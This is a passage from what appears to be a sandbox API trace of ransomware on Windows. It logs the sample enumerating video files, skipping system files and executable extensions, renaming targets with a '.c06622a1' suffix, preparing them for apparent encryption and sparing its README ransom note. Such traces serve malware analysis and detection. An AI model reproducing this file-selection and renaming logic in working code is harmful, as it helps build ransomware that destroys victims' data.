_Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" [0156.698] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6") returned 0x52 [0156.698] wcscpy (in: _Dest=0x459017e, _Source="MD5K7oNBbNoUReLGp.mp4" | out: _Dest="MD5K7oNBbNoUReLGp.mp4") returned="MD5K7oNBbNoUReLGp.mp4" [0156.699] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\MD5K7oNBbNoUReLGp.mp4", dwFileAttributes=0x80) returned 1 [0156.699] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\MD5K7oNBbNoUReLGp.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\md5k7onbbnourelgp.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0156.699] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.699] ReadFile (in: hFile=0x640, lpBuffer=0x3fe174, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe204, lpOverlapped=0x0 | out: lpBuffer=0x3fe174*, lpNumberOfBytesRead=0x3fe204*=0x90, lpOverlapped=0x0) returned 1 [0156.700] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe174, Length=0x80) returned 0xf3ae5d24 [0156.700] RtlComputeCrc32 (PartialCrc=0x5d24, Buffer=0x3fe174, Length=0x80) returned 0xf721df34 [0156.700] RtlComputeCrc32 (PartialCrc=0xdf34, Buffer=0x3fe174, Length=0x80) returned 0xd365ecf4 [0156.700] RtlComputeCrc32 (PartialCrc=0xecf4, Buffer=0x3fe174, Length=0x80) returned 0x23bb55b9 [0156.700] RtlComputeCrc32 (PartialCrc=0x55b9, Buffer=0x3fe174, Length=0x80) returned 0xd55027d9 [0156.700] CloseHandle (hObject=0x640) returned 1 [0156.700] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45a00e0 [0156.700] wcscpy (in: _Dest=0x45a00e0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\MD5K7oNBbNoUReLGp.mp4" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\MD5K7oNBbNoUReLGp.mp4") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\MD5K7oNBbNoUReLGp.mp4" [0156.700] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\MD5K7oNBbNoUReLGp.mp4") returned 0x68 [0156.700] wcscpy (in: _Dest=0x45a01b0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.700] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\MD5K7oNBbNoUReLGp.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\md5k7onbbnourelgp.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\MD5K7oNBbNoUReLGp.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\md5k7onbbnourelgp.mp4.c06622a1"), dwFlags=0x8) returned 1 [0156.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\MD5K7oNBbNoUReLGp.mp4.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\md5k7onbbnourelgp.mp4.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x640 [0156.702] CreateIoCompletionPort (FileHandle=0x640, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.702] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x49d0020 [0156.708] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xec4c3f6 [0156.708] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x126b65f2 [0156.708] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x71a0e10e [0156.708] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x587b9040 [0156.708] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x110df452 [0156.708] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7b6c0885 [0156.708] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7184a85a [0156.708] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x25e7539f [0156.711] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x49d0094, Length=0x80) returned 0x33ac87d5 [0156.711] RtlComputeCrc32 (PartialCrc=0x87d5, Buffer=0x49d0094, Length=0x80) returned 0xac083690 [0156.711] RtlComputeCrc32 (PartialCrc=0x3690, Buffer=0x49d0094, Length=0x80) returned 0xe7804439 [0156.711] RtlComputeCrc32 (PartialCrc=0x4439, Buffer=0x49d0094, Length=0x80) returned 0x4fe9a7fd [0156.711] RtlComputeCrc32 (PartialCrc=0xa7fd, Buffer=0x49d0094, Length=0x80) returned 0x9600e76e [0156.711] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x49d0020) returned 1 [0156.711] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45900d8) returned 1 [0156.711] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45a00e0) returned 1 [0156.711] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x82d08410, ftCreationTime.dwHighDateTime=0x1d5d859, ftLastAccessTime.dwLowDateTime=0x2944fb0, ftLastAccessTime.dwHighDateTime=0x1d5e138, ftLastWriteTime.dwLowDateTime=0x2944fb0, ftLastWriteTime.dwHighDateTime=0x1d5e138, nFileSizeHigh=0x0, nFileSizeLow=0xf935, dwReserved0=0x0, dwReserved1=0x0, cFileName="qBvApL nDJJvPiXix.mkv", cAlternateFileName="QBVAPL~1.MKV")) returned 1 [0156.711] _wcsicmp (_Str1="qBvApL nDJJvPiXix.mkv", _Str2="README.c06622a1.TXT") returned -1 [0156.712] wcsstr (_Str="qBvApL nDJJvPiXix.mkv", _SubStr="README") returned 0x0 [0156.712] _wcsicmp (_Str1="autorun.inf", _Str2="qBvApL nDJJvPiXix.mkv") returned -16 [0156.712] wcslen (_String="autorun.inf") returned 0xb [0156.712] _wcsicmp (_Str1="boot.ini", _Str2="qBvApL nDJJvPiXix.mkv") returned -15 [0156.712] wcslen (_String="boot.ini") returned 0x8 [0156.712] _wcsicmp (_Str1="bootfont.bin", _Str2="qBvApL nDJJvPiXix.mkv") returned -15 [0156.712] wcslen (_String="bootfont.bin") returned 0xc [0156.712] _wcsicmp (_Str1="bootsect.bak", _Str2="qBvApL nDJJvPiXix.mkv") returned -15 [0156.712] wcslen (_String="bootsect.bak") returned 0xc [0156.712] _wcsicmp (_Str1="desktop.ini", _Str2="qBvApL nDJJvPiXix.mkv") returned -13 [0156.712] wcslen (_String="desktop.ini") returned 0xb [0156.712] _wcsicmp (_Str1="iconcache.db", _Str2="qBvApL nDJJvPiXix.mkv") returned -8 [0156.712] wcslen (_String="iconcache.db") returned 0xc [0156.712] _wcsicmp (_Str1="ntldr", _Str2="qBvApL nDJJvPiXix.mkv") returned -3 [0156.712] wcslen (_String="ntldr") returned 0x5 [0156.712] _wcsicmp (_Str1="ntuser.dat", _Str2="qBvApL nDJJvPiXix.mkv") returned -3 [0156.712] wcslen (_String="ntuser.dat") returned 0xa [0156.712] _wcsicmp (_Str1="ntuser.dat.log", _Str2="qBvApL nDJJvPiXix.mkv") returned -3 [0156.712] wcslen (_String="ntuser.dat.log") returned 0xe [0156.712] _wcsicmp (_Str1="ntuser.ini", _Str2="qBvApL nDJJvPiXix.mkv") returned -3 [0156.712] wcslen (_String="ntuser.ini") returned 0xa [0156.712] _wcsicmp (_Str1="thumbs.db", _Str2="qBvApL nDJJvPiXix.mkv") returned 3 [0156.712] wcslen (_String="thumbs.db") returned 0x9 [0156.712] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0156.712] wcslen (_String="386") returned 0x3 [0156.712] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0156.712] wcslen (_String="adv") returned 0x3 [0156.712] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0156.712] wcslen (_String="ani") returned 0x3 [0156.712] _wcsicmp (_Str1="bat", _Str2="mkv") returned -11 [0156.712] wcslen (_String="bat") returned 0x3 [0156.712] _wcsicmp (_Str1="bin", _Str2="mkv") returned -11 [0156.712] wcslen (_String="bin") returned 0x3 [0156.713] _wcsicmp (_Str1="cab", _Str2="mkv") returned -10 [0156.713] wcslen (_String="cab") returned 0x3 [0156.713] _wcsicmp (_Str1="cmd", _Str2="mkv") returned -10 [0156.713] wcslen (_String="cmd") returned 0x3 [0156.713] _wcsicmp (_Str1="com", _Str2="mkv") returned -10 [0156.713] wcslen (_String="com") returned 0x3 [0156.713] _wcsicmp (_Str1="cpl", _Str2="mkv") returned -10 [0156.713] wcslen (_String="cpl") returned 0x3 [0156.713] _wcsicmp (_Str1="cur", _Str2="mkv") returned -10 [0156.713] wcslen (_String="cur") returned 0x3 [0156.713] _wcsicmp (_Str1="deskthemepack", _Str2="mkv") returned -9 [0156.713] wcslen (_String="deskthemepack") returned 0xd [0156.713] _wcsicmp (_Str1="diagcab", _Str2="mkv") returned -9 [0156.713] wcslen (_String="diagcab") returned 0x7 [0156.713] _wcsicmp (_Str1="diagcfg", _Str2="mkv") returned -9 [0156.713] wcslen (_String="diagcfg") returned 0x7 [0156.713] _wcsicmp (_Str1="diagpkg", _Str2="mkv") returned -9 [0156.713] wcslen (_String="diagpkg") returned 0x7 [0156.713] _wcsicmp (_Str1="dll", _Str2="mkv") returned -9 [0156.713] wcslen (_String="dll") returned 0x3 [0156.713] _wcsicmp (_Str1="drv", _Str2="mkv") returned -9 [0156.713] wcslen (_String="drv") returned 0x3 [0156.713] _wcsicmp (_Str1="exe", _Str2="mkv") returned -8 [0156.713] wcslen (_String="exe") returned 0x3 [0156.713] _wcsicmp (_Str1="hlp", _Str2="mkv") returned -5 [0156.713] wcslen (_String="hlp") returned 0x3 [0156.713] _wcsicmp (_Str1="icl", _Str2="mkv") returned -4 [0156.713] wcslen (_String="icl") returned 0x3 [0156.713] _wcsicmp (_Str1="icns", _Str2="mkv") returned -4 [0156.713] wcslen (_String="icns") returned 0x4 [0156.713] _wcsicmp (_Str1="ico", _Str2="mkv") returned -4 [0156.713] wcslen (_String="ico") returned 0x3 [0156.713] _wcsicmp (_Str1="ics", _Str2="mkv") returned -4 [0156.713] wcslen (_String="ics") returned 0x3 [0156.714] _wcsicmp (_Str1="idx", _Str2="mkv") returned -4 [0156.714] wcslen (_String="idx") returned 0x3 [0156.714] _wcsicmp (_Str1="ldf", _Str2="mkv") returned -1 [0156.714] wcslen (_String="ldf") returned 0x3 [0156.714] _wcsicmp (_Str1="lnk", _Str2="mkv") returned -1 [0156.714] wcslen (_String="lnk") returned 0x3 [0156.714] _wcsicmp (_Str1="mod", _Str2="mkv") returned 4 [0156.714] wcslen (_String="mod") returned 0x3 [0156.714] _wcsicmp (_Str1="mpa", _Str2="mkv") returned 5 [0156.714] wcslen (_String="mpa") returned 0x3 [0156.714] _wcsicmp (_Str1="msc", _Str2="mkv") returned 8 [0156.714] wcslen (_String="msc") returned 0x3 [0156.714] _wcsicmp (_Str1="msp", _Str2="mkv") returned 8 [0156.714] wcslen (_String="msp") returned 0x3 [0156.714] _wcsicmp (_Str1="msstyles", _Str2="mkv") returned 8 [0156.714] wcslen (_String="msstyles") returned 0x8 [0156.714] _wcsicmp (_Str1="msu", _Str2="mkv") returned 8 [0156.714] wcslen (_String="msu") returned 0x3 [0156.714] _wcsicmp (_Str1="nls", _Str2="mkv") returned 1 [0156.714] wcslen (_String="nls") returned 0x3 [0156.714] _wcsicmp (_Str1="nomedia", _Str2="mkv") returned 1 [0156.714] wcslen (_String="nomedia") returned 0x7 [0156.714] _wcsicmp (_Str1="ocx", _Str2="mkv") returned 2 [0156.714] wcslen (_String="ocx") returned 0x3 [0156.714] _wcsicmp (_Str1="prf", _Str2="mkv") returned 3 [0156.714] wcslen (_String="prf") returned 0x3 [0156.714] _wcsicmp (_Str1="ps1", _Str2="mkv") returned 3 [0156.714] wcslen (_String="ps1") returned 0x3 [0156.714] _wcsicmp (_Str1="rom", _Str2="mkv") returned 5 [0156.714] wcslen (_String="rom") returned 0x3 [0156.714] _wcsicmp (_Str1="rtp", _Str2="mkv") returned 5 [0156.714] wcslen (_String="rtp") returned 0x3 [0156.714] _wcsicmp (_Str1="scr", _Str2="mkv") returned 6 [0156.714] wcslen (_String="scr") returned 0x3 [0156.715] _wcsicmp (_Str1="shs", _Str2="mkv") returned 6 [0156.715] wcslen (_String="shs") returned 0x3 [0156.715] _wcsicmp (_Str1="spl", _Str2="mkv") returned 6 [0156.715] wcslen (_String="spl") returned 0x3 [0156.715] _wcsicmp (_Str1="sys", _Str2="mkv") returned 6 [0156.715] wcslen (_String="sys") returned 0x3 [0156.715] _wcsicmp (_Str1="theme", _Str2="mkv") returned 7 [0156.715] wcslen (_String="theme") returned 0x5 [0156.715] _wcsicmp (_Str1="themepack", _Str2="mkv") returned 7 [0156.715] wcslen (_String="themepack") returned 0x9 [0156.715] _wcsicmp (_Str1="wpx", _Str2="mkv") returned 10 [0156.715] wcslen (_String="wpx") returned 0x3 [0156.715] _wcsicmp (_Str1="lock", _Str2="mkv") returned -1 [0156.715] wcslen (_String="lock") returned 0x4 [0156.715] _wcsicmp (_Str1="key", _Str2="mkv") returned -2 [0156.715] wcslen (_String="key") returned 0x3 [0156.715] _wcsicmp (_Str1="hta", _Str2="mkv") returned -5 [0156.715] wcslen (_String="hta") returned 0x3 [0156.715] _wcsicmp (_Str1="msi", _Str2="mkv") returned 8 [0156.715] wcslen (_String="msi") returned 0x3 [0156.715] _wcsicmp (_Str1="pdb", _Str2="mkv") returned 3 [0156.715] wcslen (_String="pdb") returned 0x3 [0156.715] _wcsicmp (_Str1="sql", _Str2="mkv") returned 6 [0156.715] wcslen (_String="sql") returned 0x3 [0156.715] _wcsicmp (_Str1="sqlite", _Str2="mkv") returned 6 [0156.715] wcslen (_String="sqlite") returned 0x6 [0156.715] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6")) returned 0x10 [0156.715] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45900d8 [0156.715] wcscpy (in: _Dest=0x45900d8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6" [0156.715] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6") returned 0x52 [0156.716] wcscpy (in: _Dest=0x459017e, _Source="qBvApL nDJJvPiXix.mkv" | out: _Dest="qBvApL nDJJvPiXix.mkv") returned="qBvApL nDJJvPiXix.mkv" [0156.716] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\qBvApL nDJJvPiXix.mkv", dwFileAttributes=0x80) returned 1 [0156.716] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\qBvApL nDJJvPiXix.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\qbvapl ndjjvpixix.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x638 [0156.716] SetFilePointerEx (in: hFile=0x638, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.716] ReadFile (in: hFile=0x638, lpBuffer=0x3fe174, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe204, lpOverlapped=0x0 | out: lpBuffer=0x3fe174*, lpNumberOfBytesRead=0x3fe204*=0x90, lpOverlapped=0x0) returned 1 [0156.717] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe174, Length=0x80) returned 0x7c521667 [0156.717] RtlComputeCrc32 (PartialCrc=0x1667, Buffer=0x3fe174, Length=0x80) returned 0x389845ef [0156.717] RtlComputeCrc32 (PartialCrc=0x45ef, Buffer=0x3fe174, Length=0x80) returned 0xc8699352 [0156.717] RtlComputeCrc32 (PartialCrc=0x9352, Buffer=0x3fe174, Length=0x80) returned 0xdc3b01b4 [0156.717] RtlComputeCrc32 (PartialCrc=0x1b4, Buffer=0x3fe174, Length=0x80) returned 0xaeb6e4ee [0156.717] CloseHandle (hObject=0x638) returned 1 [0156.717] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45a00e0 [0156.717] wcscpy (in: _Dest=0x45a00e0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\qBvApL nDJJvPiXix.mkv" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\qBvApL nDJJvPiXix.mkv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\qBvApL nDJJvPiXix.mkv" [0156.717] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\qBvApL nDJJvPiXix.mkv") returned 0x68 [0156.717] wcscpy (in: _Dest=0x45a01b0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.718] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\qBvApL nDJJvPiXix.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\qbvapl ndjjvpixix.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\qBvApL nDJJvPiXix.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\qbvapl ndjjvpixix.mkv.c06622a1"), dwFlags=0x8) returned 1 [0156.720] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\483DuOeJ6\\qBvApL nDJJvPiXix.mkv.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\483duoej6\\qbvapl ndjjvpixix.mkv.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x638 [0156.720] CreateIoCompletionPort (FileHandle=0x638, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0156.720] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4a60020 [0156.726] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x78e4e85 [0156.726] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x57d63b8c [0156.726] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4a7fb11a [0156.726] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x39500b6b [0156.726] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x562eb3ef [0156.726] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x65aa4582 [0156.726] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5a19bcd0 [0156.726] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x52efcfdf [0156.729] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4a60094, Length=0x80) returned 0x1a1f7fe2 [0156.729] RtlComputeCrc32 (PartialCrc=0x7fe2, Buffer=0x4a60094, Length=0x80) returned 0xf43b7e0d [0156.729] RtlComputeCrc32 (PartialCrc=0x7e0d, Buffer=0x4a60094, Length=0x80) returned 0x78be8d14 [0156.729] RtlComputeCrc32 (PartialCrc=0x8d14, Buffer=0x4a60094, Length=0x80) returned 0x9874c596 [0156.729] RtlComputeCrc32 (PartialCrc=0xc596, Buffer=0x4a60094, Length=0x80) returned 0xb371de40 [0156.729] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4a60020) returned 1 [0156.729] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45900d8) returned 1 [0156.729] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45a00e0) returned 1 [0156.729] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbf973e0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdbf973e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbf973e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.729] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.729] FindNextFileW (in: hFindFile=0x2db8840, lpFindFileData=0x3fe2ec | out: lpFindFileData=0x3fe2ec*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.729] FindClose (in: hFindFile=0x2db8840 | out: hFindFile=0x2db8840) returned 1 [0156.730] _wcsicmp (_Str1="backup", _Str2="483DuOeJ6") returned 46 [0156.730] wcslen (_String="backup") returned 0x6 [0156.730] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0156.730] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0156.730] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29ca9ea0, ftCreationTime.dwHighDateTime=0x1d5e7d6, ftLastAccessTime.dwLowDateTime=0x6044f0, ftLastAccessTime.dwHighDateTime=0x1d5e175, ftLastWriteTime.dwLowDateTime=0x6044f0, ftLastWriteTime.dwHighDateTime=0x1d5e175, nFileSizeHigh=0x0, nFileSizeLow=0x984, dwReserved0=0x0, dwReserved1=0x0, cFileName="8uXvFATg6zvjO 7.mkv", cAlternateFileName="8UXVFA~1.MKV")) returned 1 [0156.730] _wcsicmp (_Str1="8uXvFATg6zvjO 7.mkv", _Str2="README.c06622a1.TXT") returned -58 [0156.730] wcsstr (_Str="8uXvFATg6zvjO 7.mkv", _SubStr="README") returned 0x0 [0156.730] _wcsicmp (_Str1="autorun.inf", _Str2="8uXvFATg6zvjO 7.mkv") returned 41 [0156.730] wcslen (_String="autorun.inf") returned 0xb [0156.730] _wcsicmp (_Str1="boot.ini", _Str2="8uXvFATg6zvjO 7.mkv") returned 42 [0156.730] wcslen (_String="boot.ini") returned 0x8 [0156.730] _wcsicmp (_Str1="bootfont.bin", _Str2="8uXvFATg6zvjO 7.mkv") returned 42 [0156.730] wcslen (_String="bootfont.bin") returned 0xc [0156.730] _wcsicmp (_Str1="bootsect.bak", _Str2="8uXvFATg6zvjO 7.mkv") returned 42 [0156.730] wcslen (_String="bootsect.bak") returned 0xc [0156.730] _wcsicmp (_Str1="desktop.ini", _Str2="8uXvFATg6zvjO 7.mkv") returned 44 [0156.730] wcslen (_String="desktop.ini") returned 0xb [0156.730] _wcsicmp (_Str1="iconcache.db", _Str2="8uXvFATg6zvjO 7.mkv") returned 49 [0156.730] wcslen (_String="iconcache.db") returned 0xc [0156.730] _wcsicmp (_Str1="ntldr", _Str2="8uXvFATg6zvjO 7.mkv") returned 54 [0156.730] wcslen (_String="ntldr") returned 0x5 [0156.730] _wcsicmp (_Str1="ntuser.dat", _Str2="8uXvFATg6zvjO 7.mkv") returned 54 [0156.730] wcslen (_String="ntuser.dat") returned 0xa [0156.730] _wcsicmp (_Str1="ntuser.dat.log", _Str2="8uXvFATg6zvjO 7.mkv") returned 54 [0156.730] wcslen (_String="ntuser.dat.log") returned 0xe [0156.730] _wcsicmp (_Str1="ntuser.ini", _Str2="8uXvFATg6zvjO 7.mkv") returned 54 [0156.730] wcslen (_String="ntuser.ini") returned 0xa [0156.730] _wcsicmp (_Str1="thumbs.db", _Str2="8uXvFATg6zvjO 7.mkv") returned 60 [0156.730] wcslen (_String="thumbs.db") returned 0x9 [0156.730] _wcsicmp (_Str1="386", _Str2="mkv") returned -58 [0156.730] wcslen (_String="386") returned 0x3 [0156.730] _wcsicmp (_Str1="adv", _Str2="mkv") returned -12 [0156.730] wcslen (_String="adv") returned 0x3 [0156.731] _wcsicmp (_Str1="ani", _Str2="mkv") returned -12 [0156.731] wcslen (_String="ani") returned 